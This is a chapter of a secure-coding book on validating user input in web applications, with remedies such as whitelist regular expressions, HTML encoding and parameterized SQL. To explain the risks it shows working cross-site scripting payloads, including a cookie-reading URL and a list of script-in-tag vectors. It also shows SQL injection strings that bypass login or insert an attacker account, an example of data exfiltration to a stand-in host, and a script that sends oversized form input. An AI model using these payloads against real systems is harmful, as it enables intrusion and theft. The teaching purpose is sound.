Never Trust User Input | Writing Secure Code, Second Edition

Never Trust User Input!

I know this injunction sounds harsh, as if people are out to get you. But many are. If you accept input from users, either directly or indirectly, it is imperative that you validate the input before using it, because people will try to make your application fail by tweaking the input to represent invalid data. The first golden rule of user input is, "All input is bad until proven otherwise." Typically, the moment you forget this rule is the moment you are attacked. In this section, we'll focus on the many ways developers read input, how developers use the input, and how attackers try to trip up your application by manipulating the input.

Let me introduce you to the second golden rule of user input: Data must be validated as it crosses the boundary between untrusted and trusted environments. By definition, trusted data is data that you, or an entity you explicitly trust, has complete control over; untrusted data refers to everything else. In short, any data submitted by a user is initially untrusted data. The reason I bring this up is that many developers balk at checking input because they are positive that the data is checked by some other function that eventually calls their application, and they don't want to take the performance hit of validating the data. But what happens if the input comes from a source that is not checked, or the code you depend on is changed because it assumes some other code performs a validity check?


	A somewhat related question is, what happens if an honest user simply makes an input mistake that causes your application to fail? Keep this in mind when I discuss some potential vulnerabilities and exploits.

I once reviewed a security product that had a security flaw because a small chance existed that invalid user input would cause a buffer overrun and stop the product's Web service. The development team claimed that it could not check all the input because of potential performance problems. On closer examination, I found that not only was the application a critical network component (and hence the potential damage from an exploit was immense), but it also performed many time-intensive and CPU-intensive operations, including public-key encryption, heavy disk I/O, and authentication. I very much doubted that a half dozen lines of input-checking code would lead to a performance problem. As it turned out, the input-checking code caused no performance problems, and the flaw was fixed.


	Performance is rarely a problem when checking user input. Even if it is, no system is less reliably responsive than a hacked system.

Hopefully, by now, you understand that all input is suspicious until proven otherwise, and your application should validate direct user input before it uses it. Let's look at some strategies for handling hostile input.


	If you still don't believe all input should be treated as unclean, I suggest you randomly choose any 10 past vulnerabilities. You'll find that in the majority of cases the exploit relies on malicious input. I guarantee it!

User Input Vulnerabilities

Virtually all Web applications perform some action based on user requests. Let's be honest: a Web-based service that doesn't take user input is probably worthless! Remember that you should determine what is valid data and reject all other input. Let's look at an example, which is based on some Active Server Pages (ASP) code from a Web site that recommended Web site designers use the following JScript code in their ASP-based applications to implement forms-based authentication:

// Get the username and password from the form.
if (isValidUserAndPwd(Request.form("name"),
                      Request.form("pwd"))) {
    Response.write("Authenticated!");
} else {
    Response.write("Access Denied");
}

function isValidUserAndPwd(strName, strPwd) {
    var fValid = false;
    var oConn = new ActiveXObject("ADODB.Connection");
    oConn.Open("Data Source=c:\\auth\\auth.mdb;");
    var strSQL = "SELECT count(*) FROM client WHERE " +
        "name='" + strName + "' " +
        "and pwd='" + strPwd + "'";
    var oRS = new ActiveXObject("ADODB.RecordSet");
    oRS.Open(strSQL, oConn);
    fValid = (oRS(0).Value > 0) ? true : false;
    oRS.Close();
    delete oRS;
    oConn.Close();
    delete oConn;
    return fValid;
}

Below is the client code used to send the username and password to the JScript code by using an HTTP POST:

<FORM ACTION="Logon.asp" METHOD=POST>
    <INPUT TYPE=text MAXLENGTH=32 NAME=name>
    <INPUT TYPE=password MAXLENGTH=32 NAME=pwd>
    <INPUT TYPE=submit NAME=submit VALUE="Logon">
</FORM>

An explanation of this code is in order. The user enters a username and a password by using the HTML form shown above and then clicks the Logon button. The ASP code takes the username and password from the form and builds a SQL statement based on the user's data to query a database. If the count returned by the query is greater than zero (SELECT count(*) returns the number of rows that match the SQL query), the username and password combination is valid and the user is allowed to log on to the system.

Both the client and server code are hopelessly flawed, however, because the solution takes direct user input and uses it to access a database without checking whether the input is valid. In other words, data is transferred from an untrusted source (a user) to a trusted source (the SQL database under application control).

Let's assume a nonmalicious user enters his name, Blake, and password $qu1r+, which builds the following SQL statement:

SELECT count(*) FROM client WHERE name='Blake' and pwd='$qu1r+'

If this is a valid username and password combination, count(*) returns a value of at least 1 and allows the user access to the system. The query could potentially return more than 1 if two users exist with the same username and password or if an administrative error leads to the data being entered twice.

Now let's turn our attention to what a bad guy might do to compromise the system. Because the username and password are unchecked by the ASP application, the attacker can send any input. We'll look at this as a series of mistakes and then determine how to remedy the errors.

Mistake #1: Trusting the User

You should never trust user input directly, especially if the user input is anonymous. Remember the two golden rules: never trust user input, and always check data as it moves from an untrusted to a trusted domain.

A malicious user input scenario to be wary of is that of your application taking user input and using the input to create output for other users. For example, consider the security ramifications if you build a Web service that allows users to create and post product reviews for other users of the system to read prior to making a product purchase. Imagine that an attacker does not like Product_A but likes Product_B. The attacker creates a comment about Product_A, which will appear on the Product_A Web page, along with all the other reviews. However, the comment is this:

<meta http-equiv="refresh" content="2;URL=http://www.northwindtraders.com/productb.aspx">

This HTML code will send the user's browser to the product page for Product_B after the browser has spent two seconds at the page for Product_A!

Cross-site scripting

Another variation of this attack is the cross-site scripting attack. Once again, trust of user input is at fault, but in this case an attacker sends a link in e-mail to a user or otherwise points the user to a link to a Web site, and a malicious payload is in the query string embedded in the URL. The attack is particularly bad if the Web site creates an error message with the embedded query string as part of the error text.

Let's look at a fictitious example. A Web service allows you to view remote documents by including the document name in the query string. For example,

http://servername/view.asp?file=filename

An attacker sends the following URL in e-mail (probably by using SMTP spoofing to disguise the attacker's identity) to an unsuspecting victim:

http://servername/view.asp?file=<script>x=document.cookie;alert("Cookie%20"%20%2b%20x);</script>

Note the use of %nn characters; these are hexadecimal escape sequences for ASCII characters and are explained later in this chapter. For the moment, all you need to know is that %20 is a space and %2b is a plus (+) symbol. The reason for using the escapes is to remove any spaces and certain special characters from the query string so that it's correctly parsed by the server.

When the victim clicks the URL, the Web server attempts to access the file in the query string, which is not a file at all but JScript code. The server can't find the file, so it sends an error to the user to that effect. However, it also includes the name of the file that could not be found in the error message. The script that makes up the filename is then executed by the user's browser. You can do some serious damage with small amounts of JScript!
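To make the reflection concrete, here is a minimal JavaScript (Node.js) sketch of the fictitious view.asp error path. It assumes the server decodes the query string and pastes the requested filename, unencoded, into its error page; parseRequestedFile and buildErrorPage are hypothetical names, and the code only builds strings.

```javascript
// Hypothetical helper: pull the "file" value out of the request URL.
// URLSearchParams decodes %nn escapes, so %20 becomes a space and %2b a plus.
function parseRequestedFile(url) {
  return new URL(url).searchParams.get("file");
}

// Hypothetical vulnerable error page: the filename is concatenated
// into HTML without any encoding.
function buildErrorPage(file) {
  return "<p>File not found: " + file + "</p>";
}

const attackUrl =
  'http://servername/view.asp?file=<script>x=document.cookie;alert("Cookie%20"%20%2b%20x);</script>';

const file = parseRequestedFile(attackUrl);
console.log(file);
// <script>x=document.cookie;alert("Cookie " + x);</script>
console.log(buildErrorPage(file)); // the script lands in the page verbatim
```

The browser has no way to tell this script apart from script the site intended to send, which is why the payload runs with the site's privileges.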

With cross-site scripting, cookies can be read; browser plug-ins or native code can be instantiated and scripted with untrusted data; and user input can be intercepted. Any Web browser supporting scripting is potentially vulnerable, as is any Web server that supports HTML forms. Furthermore, data gathered by the malicious script can be sent back to the attacker's Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, it can send the data to the attacker by fetching a URL of the form http://www.northwindtraders.com/CollectData.html?data=SSN123-45-6789.


	Using SSL/TLS does not mitigate cross-site scripting issues.

This attack can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that doesn't check fields in forms for special characters. This isn't trivial to determine unless the attacker has inside knowledge, but it is possible.

Many cross-site scripting bugs were found in many products during 2000, which led to the CERT Coordination Center at Carnegie Mellon University issuing a security advisory entitled "Malicious HTML Tags Embedded in Client Web Requests," warning developers of the risks of cross-site scripting. You can find out more at www.cert.org/advisories/CA-2000-02.html. A wonderful explanation of the issues is also available in "Cross-Site Scripting Overview" at www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp.

Mistake #2: Unbounded Sizes

If the size of the client data is unbounded and unchecked, an attacker can send as much data as she wants. This could be a security issue if there exists an as-yet-unknown buffer overrun in the database code called when invoking the SQL query. On closer examination, an attacker can easily bypass the maximum username and password size restrictions imposed by the previous client HTML form code, which restricts both fields to 32 characters, simply by not using the client code. Instead, attackers write their own client code in, say, Perl, or just use a Telnet client. The following is such an example, which sends a valid HTML form to Logon.asp but sets the password and username to be 32,000 letter As.

use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

$ua = LWP::UserAgent->new();
$req = POST 'http://www.northwindtraders.com/Logon.asp',
    [ pwd  => 'A' x 32000,
      name => 'A' x 32000,
    ];
$res = $ua->request($req);

Do not rely on client-side HTML security checks in this case. The form restricts the username and password to 32 characters, but an attacker can always bypass such controls by bypassing the client altogether.
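A minimal JavaScript sketch of the check that has to live on the server follows. The 32-character limit simply mirrors the MAXLENGTH attributes in the form, and checkFieldLength is a hypothetical helper, not part of ASP.

```javascript
// Hypothetical server-side length check. The default limit mirrors
// MAXLENGTH=32 in the form, but it is enforced where a custom client
// cannot skip it.
const MAX_FIELD_LENGTH = 32;

function checkFieldLength(value, max = MAX_FIELD_LENGTH) {
  // Reject missing values, non-strings, empty strings, and overlong input.
  return typeof value === "string" && value.length >= 1 && value.length <= max;
}

// The Perl client above sends 32,000 'A' characters in each field.
const oversized = "A".repeat(32000);
console.log(checkFieldLength("Blake"));   // true
console.log(checkFieldLength(oversized)); // false
```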

Mistake #3: Using Direct User Input in SQL Statements

This scenario is a little more insidious. Because the input is untrusted and has not been checked for validity, an attacker could change the semantics of the SQL statement. In the following example, the attacker enters a completely invalid name and password, both of which are b' or '1' = '1, which builds the following valid SQL statement:

SELECT count(*) FROM client WHERE name='b' or '1' = '1' and pwd='b' or '1' = '1'

Look closely and you'll see that this statement will always return a row count greater than zero (assuming the table holds any rows). Because AND binds more tightly than OR, the WHERE clause is evaluated as name='b' or ('1' = '1' and pwd='b') or '1' = '1', and that final '1' = '1' is true for every row. The attacker is authenticated without knowing a valid username or password; he simply entered some input that changed the way the SQL query works.

Here's another variation: if the attacker knows a username and wants to spoof that user account, he can do so by using SQL comments: for example, two hyphens (--) in Microsoft SQL Server or the hash sign (#) in MySQL. Some other databases use the semicolon (;) as the comment symbol. Rather than entering b' or '1' = '1, the attacker enters Cheryl' --, which builds up the following legal SQL statement:

SELECT count(*) FROM client WHERE name='Cheryl' --' and pwd=''

If a user named Cheryl is defined in the system, the attacker can log in because he has commented out the rest of the SQL statement, which evaluates the password, so that the password is not checked!

The types of attacks open to an assailant don't stop there. Allow me to show you one more scenario, and then I'll focus on solutions for the issues we've examined.

SQL statements can be joined. For example, the following SQL is valid:

SELECT * from client INSERT into client VALUES ('me', 'URHacked')

This single line is actually two SQL statements. The first selects all rows from the client table, and the second inserts a new row into the same table.


	One of the reasons the INSERT statement might work for an attacker is because most people connect to SQL databases by using elevated accounts, such as the sysadmin account (sa) in SQL Server. This is yet another reason to use least-privilege principles when designing Web applications.

An attacker could use this login ASP page and enter a username of b' INSERT INTO client VALUES ('me', 'URHacked') --, which would build the following SQL:

SELECT count(*) FROM client WHERE name='b' INSERT INTO client VALUES ('me', 'URHacked') --' and pwd=''

Once again, the password is not checked, because that part of the query is commented out. Worse, the attacker has added a new row containing me as a username and URHacked as the password. Now the attacker can log in using me and URHacked!
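The following JavaScript sketch reproduces the string concatenation in isValidUserAndPwd, so you can see the exact SQL each input produces, including the three attacks just described. It builds strings only and never touches a database; buildLogonQuery is a hypothetical name.

```javascript
// Same concatenation as isValidUserAndPwd (string building only).
function buildLogonQuery(strName, strPwd) {
  return "SELECT count(*) FROM client WHERE " +
    "name='" + strName + "' " +
    "and pwd='" + strPwd + "'";
}

// Benign input.
const benign = buildLogonQuery("Blake", "$qu1r+");
// Attack 1: a tautology in both fields.
const tautology = buildLogonQuery("b' or '1' = '1", "b' or '1' = '1");
// Attack 2: comment out the password test.
const commented = buildLogonQuery("Cheryl' --", "");
// Attack 3: stack a second statement, then comment out the rest.
const stacked = buildLogonQuery("b' INSERT INTO client VALUES ('me', 'URHacked') --", "");

for (const sql of [benign, tautology, commented, stacked]) {
  console.log(sql);
}
```

In every case, whatever the attacker types after the closing quote is interpreted as SQL syntax rather than as data.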


	A wonderful example of this kind of exploit against AdCycle, an advertising management software package that uses the MySQL database, was discovered in July 2001. Any user can become the administrator of an AdCycle system by taking advantage of this kind of vulnerability. More information is available at qdefense.com/Advisories/QDAV-2001-7-2.html.

Enough bad news; let's look at remedies!

User Input Remedies

As with all user input issues, the first rule is to determine which input is valid and to reject all other input. (Have I said that enough times?) Other, not-so-paranoid options exist and offer more functionality with potentially less security. I'll discuss some of these also.

A Simple and Safe Approach: Be Hardcore About Valid Input

In the cases of the Web-based form and SQL examples earlier, the valid characters for a username can be easily restricted to a small set of valid characters, such as A-Za-z0-9. The following server-side JScript snippet shows how to construct and use a regular expression to parse the username at the server:

// Determine whether username is valid.
// Valid format is 1 to 32 alphanumeric characters.
var reg = /^[A-Za-z0-9]{1,32}$/g;
if (reg.test(Request.form("name"))) {
    // Cool! Username is valid.
} else {
    // Not cool! Username is invalid.
}


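	Note the use of the g option at the end of the expression just shown. This is the global option, which tells the engine to find every match rather than stopping at the first. It is not what protects you from multiline input, however: in JScript, ^ and $ anchor to the start and end of the entire input unless you also set the m (multiline) option, so an attacker cannot slip extra lines past this check. Take care when reusing a global expression, because test() records where it stopped in the lastIndex property and starts the next search from there.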

Not only does this regular expression restrict the username to a small subset of characters, but it also makes sure the string is between 1 and 32 characters long. If you make decisions about user input in COM components written in Microsoft Visual Basic or C++, you should read Chapter 8, "Canonical Representation Issues," to learn how to use regular expressions in other languages.


	Note the use of ^ and $ in the regular expression: these signify that all characters from the start (^) to the end ($) of the input must match the pattern. Otherwise, the regular expression needs to match only a portion of the string. For example, /[A-Za-z0-9]{1,32}/ accepts any input that contains a single alphanumeric character anywhere, so HTML tags or script such as <script>alert("hi!")</script> would pass the check, because the word script matches the expression.
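Here is a minimal JavaScript sketch of the username check, written so it can run outside ASP. It deliberately omits the g flag: a global expression keeps its position in lastIndex between calls to test(), which would matter here because the same expression object is reused. Because ^ and $ are used without the m flag, they anchor to the very start and end of the whole input, which is what rejects the embedded newline below. isValidUsername is a hypothetical name.

```javascript
// 1 to 32 ASCII letters or digits, and nothing else.
// No g flag, so test() carries no state between calls.
const validUsername = /^[A-Za-z0-9]{1,32}$/;

// The same pattern without ^ and $, for comparison only.
const unanchored = /[A-Za-z0-9]{1,32}/;

function isValidUsername(name) {
  return typeof name === "string" && validUsername.test(name);
}

const script = '<script>alert("hi!")</script>';
console.log(isValidUsername("Blake"));           // true
console.log(isValidUsername("A".repeat(33)));    // false: too long
console.log(isValidUsername("Blake\n<script>")); // false: $ means end of input
console.log(isValidUsername(script));            // false
console.log(unanchored.test(script));            // true: "script" matches
```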

Your code should apply a regular expression to all input, whether it is part of a form, an HTTP header, or a query string.

In the case of the filename passed to the Web server as a query string, the following regular expression, which represents a valid filename (note that this does not allow for directories or drive letters!), would stamp out any attempt to use script as part of the query string:

// Determine whether filename is valid.
// Valid format is 1 to 24 alphanumeric characters
// followed by a period, and 1 to 3 alpha characters.
var reg = /^[A-Za-z0-9]{1,24}\.[A-Za-z]{1,3}$/g;
if (reg.test(Request.Querystring("file"))) {
    // Cool! Valid filename.
} else {
    // Not cool! Invalid filename.
}
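The filename rule can be exercised the same way. This JavaScript sketch reuses the pattern above (again without the g flag) against a few hypothetical inputs, including a directory traversal attempt and the script payload from the cross-site scripting example.

```javascript
// Filename rule from the text: 1 to 24 alphanumerics, a period, then
// 1 to 3 letters. No directories, drive letters, or extra periods.
const validFilename = /^[A-Za-z0-9]{1,24}\.[A-Za-z]{1,3}$/;

// Hypothetical inputs paired with the result we expect.
const filenameSamples = [
  ["report.txt", true],
  ["..\\..\\boot.ini", false],  // directory traversal
  ["c:\\secret.txt", false],    // drive letter and backslash
  ["archive.tar.gz", false],    // more than one period
  ['<script>x=document.cookie;alert("Cookie " + x);</script>', false],
];

for (const [name, expected] of filenameSamples) {
  console.log(JSON.stringify(name), validFilename.test(name), "expected:", expected);
}
```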

Not being strict is dangerous

A common mistake made by many Web developers is to allow "safe" HTML constructs, for example, allowing a user to send <IMG> or <TABLE> tags to the Web application. The idea is that the user can then send these HTML tags but nothing else, other than plaintext. Do not do this. A cross-site scripting danger still exists, because the attacker can embed script in some of these tags. Here are some examples:

<img src=javascript:alert(document.domain)>
<link rel=stylesheet href="javascript:alert(document.domain)">
<input type=image src=javascript:alert(document.domain)>
<bgsound src=javascript:alert(document.domain)>
<iframe src="javascript:alert(document.domain)">
<frameset onload=vbscript:msgbox(document.cookie)></frameset>
<table background="javascript:alert(document.domain)"></table>
<object type=text/html data="javascript:alert(document.domain);"></object>
<body onload="javascript:alert(document.cookie)"></body>
<body background="javascript:alert(document.cookie)"></body>
<p style=left:expression(alert(document.cookie))>

Let's say you want to allow a small subset of HTML tags so that your users can add some formatting to their comments. Allowing tags like <I> </I> and <B> </B> is safe, so long as the regular expression looks for these character sequences explicitly. The following regular expression will allow these tags, as well as other safe characters:

var reg = /^(?:[\s\w\?\.\,\!\$]+|(?:\<\/?[ib]\>))+$/gi;
if (reg.test(strText)) {
    // Cool! Valid input.
} else {
    // Not cool! Invalid input.
}

This regular expression will allow spaces (\s); A-Za-z0-9 and _ (\w); a limited subset of punctuation; and tags formed by <, an optional /, the letter i or b, and >. The i at the end of the expression makes the check case-insensitive. Note that this regular expression does not validate that the input is well-formed HTML. For example, Hello, </i>World!<i> is legal input to the regular expression, but it is not well-formed HTML, even though the tags are not malicious.
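A runnable JavaScript sketch of the same rule follows. It drops the inner + so that each repetition consumes exactly one safe character or one tag. The result accepts the same strings as the expression above while avoiding nested quantifiers, which a backtracking regular expression engine can process very slowly on long, almost-valid input. The sample inputs are hypothetical.

```javascript
// Safe characters (whitespace, word characters, ? . , ! $) or the tags
// <i>, </i>, <b>, </b>; the i flag makes <B> and <I> acceptable too.
const safeText = /^(?:[\s\w?.,!$]|<\/?[ib]>)+$/i;

// Hypothetical inputs paired with the result we expect.
const tagSamples = [
  ["Hello, </i>World!<i>", true],  // accepted, though not well formed
  ["This is <B>great</B>!", true],
  ["<script>alert(1)</script>", false],
  ["<img src=javascript:alert(document.domain)>", false],
  ["<i onmouseover=alert(1)>", false],  // attributes are not allowed
];

for (const [text, expected] of tagSamples) {
  console.log(JSON.stringify(text), safeText.test(text), "expected:", expected);
}
```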

So you think you're safe?

Another mistake I've seen involves converting all input to uppercase to thwart JScript attacks, because JScript is primarily lowercase and case-sensitive. And what if the attacker uses Visual Basic Scripting Edition (VBScript), which is case-insensitive, instead? Don't think that stripping single or double quotes will help either; many script and HTML constructs take arguments without quotes.

In summary, you should be strict about what is valid user input, and make sure the regular expression does not allow HTML in the input, especially if the input might become output for other users.

Special Care of Passwords

You could potentially use regular expressions to restrict passwords to a limited subset of valid characters. But doing so is problematic because you need to allow complex passwords, which means allowing many nonalphanumeric characters. A naive approach is to use the same regular expression defined earlier but restrict the valid character list to A-Za-z0-9 and a series of punctuation characters you know are safe. This requires that you understand all the special characters used by your database, or used by the shell if you're passing the data to another process. Even worse, you might disallow certain characters, such as the | character, but allow the % character and numerals, in which case the attacker can smuggle in the | character by using a hexadecimal escape, %7c, which consists entirely of characters the regular expression accepts.
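This small JavaScript sketch shows the hexadecimal-escape problem. The character list in naiveRule is a hypothetical example of a password rule that leaves out | but allows % and digits, and decodeURIComponent stands in for any later layer that decodes %nn escapes.

```javascript
// Hypothetical "safe" password rule: | is not in the list, but % and
// digits are.
const naiveRule = /^[A-Za-z0-9%!.,]{1,32}$/;

const password = "pa%7css";
console.log(naiveRule.test(password));     // true: passes the check
console.log(decodeURIComponent(password)); // "pa|ss" once something decodes it
```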

One way of handling passwords is not to use the password directly; instead, you could base64-encode or hash the password prior to passing it to the query. The former is reversible, which means that if the Web application requires the plaintext password for some other task, it can base64-decode the password held in the database. However, if you do not need to use the password other than to authenticate the incoming client authentication attempt, you can simply hash the password and compare the result with the hash stored in the database. The positive side effect of this approach is that if the authentication database is compromised, the attacker has access only to the password hashes and not to the passwords themselves. Refer to Chapter 7 for more information about this process.


	If you hash passwords, you should also salt the hashes, so that users who happen to share a password end up with different stored hashes and the hashes are more resilient to dictionary attacks. Refer to Chapter 7 for more information regarding salting data.
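As a sketch of salted hashing, the following JavaScript uses PBKDF2 from the Node.js crypto module. That choice, the iteration count, and the salt and key sizes are assumptions for illustration, not necessarily the method Chapter 7 describes. Each user gets a random salt that is stored alongside the hash, and verification recomputes the hash and compares it in constant time.

```javascript
const crypto = require("crypto");

// Illustrative parameters (assumptions, not values from the text).
const SALT_BYTES = 16;
const KEY_BYTES = 32;
const ITERATIONS = 100000;

function hashPassword(password) {
  // A fresh random salt per user; it is stored, not kept secret.
  const salt = crypto.randomBytes(SALT_BYTES);
  const hash = crypto.pbkdf2Sync(password, salt, ITERATIONS, KEY_BYTES, "sha256");
  return { salt: salt.toString("hex"), hash: hash.toString("hex") };
}

function verifyPassword(password, stored) {
  const salt = Buffer.from(stored.salt, "hex");
  const expected = Buffer.from(stored.hash, "hex");
  const actual = crypto.pbkdf2Sync(password, salt, ITERATIONS, KEY_BYTES, "sha256");
  // timingSafeEqual throws on length mismatch, so check that first.
  if (actual.length !== expected.length) return false;
  return crypto.timingSafeEqual(actual, expected);
}

const alice = hashPassword("$qu1r+");
const bob = hashPassword("$qu1r+");
console.log(alice.hash === bob.hash);             // false: different salts
console.log(verifyPassword("$qu1r+", alice));     // true
console.log(verifyPassword("wrong guess", alice)); // false
```

Because the salt is random, hashing the same password twice yields two different stored hashes, so an attacker cannot spot users who share a password or reuse one precomputed dictionary against every account.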

The preferred approach is to use the Web server's capabilities to encode the password. In the case of ASP, you can use the Server.URLEncode method to encode the password, and you can use HttpServerUtility.UrlEncode in ASP.NET. URLEncode applies various rules to convert nonalphanumeric characters to hexadecimal equivalents. For example, the password '2Z.81h\/^-$% (which begins with an apostrophe) becomes %272Z%2E81h%5C%2F%5E%2D%24%25. The password has the same effective strength in both cases; you incur no loss of password entropy when performing the encoding operation.


	Encoding is not encryption!

What's really cool about URLEncode is that it caters to UTF-8 characters also, so long as the Web page can process UTF-8 characters. For example, the nonsense French phrase "Général à la François" becomes G%C3%A9n%C3%A9ral+%C3%A0+la+Fran%C3%A7ois. You can force an ASP page to use UTF-8 data by setting Session.Codepage=65001 at the start of the ASP page or by using the HttpSessionState.CodePage property in ASP.NET.
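If you want to see what this encoding looks like, the following JavaScript function approximates it: ASCII letters and digits pass through, a space becomes +, and every other byte of the UTF-8 encoding becomes %XX. It is a hypothetical stand-in written to reproduce the two examples in the text, not Server.URLEncode itself, and it is not guaranteed to match Server.URLEncode for characters the text doesn't show.

```javascript
// Hypothetical approximation of the encoding shown in the text.
function urlEncodeAllNonAlnum(text) {
  const bytes = new TextEncoder().encode(text); // UTF-8 bytes
  let out = "";
  for (const b of bytes) {
    const isAlnum =
      (b >= 0x30 && b <= 0x39) || // 0-9
      (b >= 0x41 && b <= 0x5a) || // A-Z
      (b >= 0x61 && b <= 0x7a);   // a-z
    if (isAlnum) {
      out += String.fromCharCode(b);
    } else if (b === 0x20) {
      out += "+";                 // space
    } else {
      out += "%" + b.toString(16).toUpperCase().padStart(2, "0");
    }
  }
  return out;
}

console.log(urlEncodeAllNonAlnum("'2Z.81h\\/^-$%"));
// %272Z%2E81h%5C%2F%5E%2D%24%25
console.log(urlEncodeAllNonAlnum("Général à la François"));
// G%C3%A9n%C3%A9ral+%C3%A0+la+Fran%C3%A7ois
```

Encoding every non-alphanumeric byte is deliberately blunt: the output contains only letters, digits, +, and %, none of which carries special meaning in a quoted SQL string.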

Do not give up if your application does not have access to the CodePage property or the URLEncode method. You have five options. The first is to use the UrlEscape function exported by Shlwapi.dll. The second is to use CoInternetParseUrl exported by Urlmon.dll. The third is to use InternetCanonicalizeUrl exported by Wininet.dll. You can also use the ATL Server CUrl::Canonicalize method defined in Atlutil.h. If your application uses JScript, you can use the escape and unescape functions to encode and decode the string.

Note that UrlEscape and CoInternetParseUrl should be called from client applications only, and it's recommended that you check each function or method before using it to verify it has the appropriate options and capabilities for your application.


	None of the URL encoding functions explained in this section is being used to encode a URL. They encode arbitrary passwords by using URL encoding techniques; the password is not passed in the URL!

When Input Becomes Output

In the case of allowing users to post reviews, or in any situation in which you gather user input and use the input to create output for other users, you should be highly restrictive. For example, very few Web sites require a message to contain more than A-Za-z0-9 and a limited subset of punctuation, including whitespace, quotes, and the characters .,!?. You can achieve this with the following regular expression sample written in VBScript:

Set reg = New RegExp
reg.Pattern = "^[A-Za-z0-9\s\.\,\!\?\'\""]+$"
reg.Global = True
If reg.Test(strPostedMessage) = True Then
    ' Input is valid.
Else
    ' Input is invalid.
End If

Another option is to encode the input data before displaying it. Luckily, this is simple to achieve using the ASP Server.HTMLEncode method or the ASP.NET HttpServerUtility.HtmlEncode method. These methods convert dangerous symbols, including the characters that make up HTML tags, to their HTML representation; for example, < becomes &lt;.
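For illustration, here is a minimal JavaScript sketch of HTML encoding applied to the product-review comment from earlier in the chapter. htmlEncode is a hypothetical helper covering the five characters that matter in element content and quoted attribute values; it is not a reimplementation of Server.HTMLEncode.

```javascript
// Hypothetical encoder for text placed between tags or in quoted attributes.
function htmlEncode(text) {
  return text
    .replace(/&/g, "&amp;") // must run first so later entities aren't re-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The malicious product review from the "Trusting the User" example.
const review =
  '<meta http-equiv="refresh" content="2;URL=http://www.northwindtraders.com/productb.aspx">';
console.log(htmlEncode(review));
// &lt;meta http-equiv=&quot;refresh&quot; content=&quot;2;URL=http://www.northwindtraders.com/productb.aspx&quot;&gt;
```

The browser now displays the review as literal text instead of obeying it as a redirect.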

Building SQL Statements Securely

Building SQL strings in code is problematic, as demonstrated earlier in this chapter. A simple way to remedy this is to leave the completion of the SQL string to the database and not attempt the SQL string construction in your code. You can do this in two ways. The first is to pass the user's input to a stored procedure (SP), assuming the database supports SPs. SQL Server supports SPs, as do many other server-based databases, such as Oracle and IBM's DB2. Flat-file databases, such as Microsoft Access and Microsoft FoxPro, do not support stored procedures. Actually, that's not quite correct: both Access and FoxPro can connect to server-based databases to take some advantage of stored procedures.

The previous SQL example can be replaced with the SQL Server SP that follows.

CREATE PROCEDURE IsValid @uname varchar(32), @pwd varchar(32)
AS
    SELECT count(*) FROM client
    WHERE @uname = name AND @pwd = pwd
GO

And the ASP code becomes

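var strSQL = "IsValid '" + strName + "', '" + strPwd + "'";
var oRS = new ActiveXObject("ADODB.RecordSet");
oRS.Open(strSQL, oConn);
fValid = (oRS(0).Value > 0) ? true : false;

Be aware that this version still builds the call by concatenating user input into a string, so a username that contains a single quote can break out of its argument and change the command. To get the full benefit of the stored procedure, pass strName and strPwd to it as parameters rather than splicing them into the command text, using the parameterized technique described next.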

Another way to perform this kind of processing is to use placeholders, which are often referred to as parameterized commands. When you define the query, you determine which parts of the SQL statement are the parameters. For example, the following is the parameterized version of the authentication SQL string defined previously:

SELECT count(*) FROM client WHERE name=? AND pwd=?

Next, we need to define what the parameters are; these are passed along with the skeletal SQL query to the SQL database for processing. The following VBScript function outlines how to use SQL placeholders:

Function IsValidUserAndPwd(strName, strPwd)
    ' Note I am using a trusted connection to SQL Server.
    ' Never use uid=sa;pwd= !!
    strConn = "Provider=sqloledb;" + _
              "Server=server-sql;" + _
              "database=client;" + _
              "trusted_connection=yes"
    Set cn = CreateObject("ADODB.Connection")
    cn.Open strConn

    Set cmd = CreateObject("ADODB.Command")
    cmd.ActiveConnection = cn
    cmd.CommandText = _
        "select count(*) from client where name=? and pwd=?"
    cmd.CommandType = 1    ' 1 means adCmdText
    cmd.Prepared = true

    ' Explanation of numeric parameters:
    ' data type is 200, varchar string;
    ' direction is 1, input parameter only;
    ' size of data is 32 chars max.
    Set parm1 = cmd.CreateParameter("name", 200, 1, 32, "")
    cmd.Parameters.Append parm1
    parm1.Value = strName

    Set parm2 = cmd.CreateParameter("pwd", 200, 1, 32, "")
    cmd.Parameters.Append parm2
    parm2.Value = strPwd

    Set rs = cmd.Execute

    IsValidUserAndPwd = false
    If rs(0).value = 1 Then IsValidUserAndPwd = true

    rs.Close
    cn.Close
End Function

Additionally, parameterized queries and stored procedures are faster than hand-crafting the SQL query in code. It's not often you find an approach that's both more secure and faster!

One prime benefit of using parameters is that you can define the parameter data type. For example, if you define a numeric parameter, the strong type checking will thwart most attacks because a SQL-based attack cannot be made purely from numbers. Look at Table 12-1 for some examples of data types.

Table 12-1 A Data Type Rosetta Stone
ADO Constant	OLE-DB Constant	SQL Server Type	Value	Comments
adBigInt	DBTYPE_I8	bigint	20	Eight-byte signed integer
adChar	DBTYPE_STR	char	129	A string
adCurrency	DBTYPE_CY	smallmoney and money	6	Currency value
adDate	DBTYPE_DATE	None; treated as a char	7	Date value stored as a double
adDBTimeStamp	DBTYPE_DBTIMESTAMP	smalldatetime	135	Date value in yyyymmddhhmmss form
adDouble	DBTYPE_R8	float	5	Double-precision floating-point number
adEmpty	DBTYPE_EMPTY	Any SQL data type can be NULL	0	No value
adGUID	DBTYPE_GUID	uniqueidentifier	72	A globally unique identifier
adInteger	DBTYPE_I4	int	3	Four-byte signed integer
adVarChar	DBTYPE_STR	varchar	200	A variable-length, null-terminated character string
adWChar	DBTYPE_WSTR	nchar	130	A null-terminated Unicode character string
adBoolean	DBTYPE_BOOL	bit	11	A Boolean: True (nonzero) or False (zero)
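A typed parameter rejects anything that is not a value of the declared type. The same idea can be sketched on the application side in JavaScript for adInteger, whose four-byte signed range runs from -2,147,483,648 to 2,147,483,647. toInt4 is a hypothetical helper; it complements a typed parameter rather than replacing one.

```javascript
// Range of a four-byte signed integer (adInteger / DBTYPE_I4 / int).
const INT4_MIN = -2147483648;
const INT4_MAX = 2147483647;

// Returns the value as a number, or null if the input is not a plain
// decimal integer that fits in a four-byte signed int.
function toInt4(input) {
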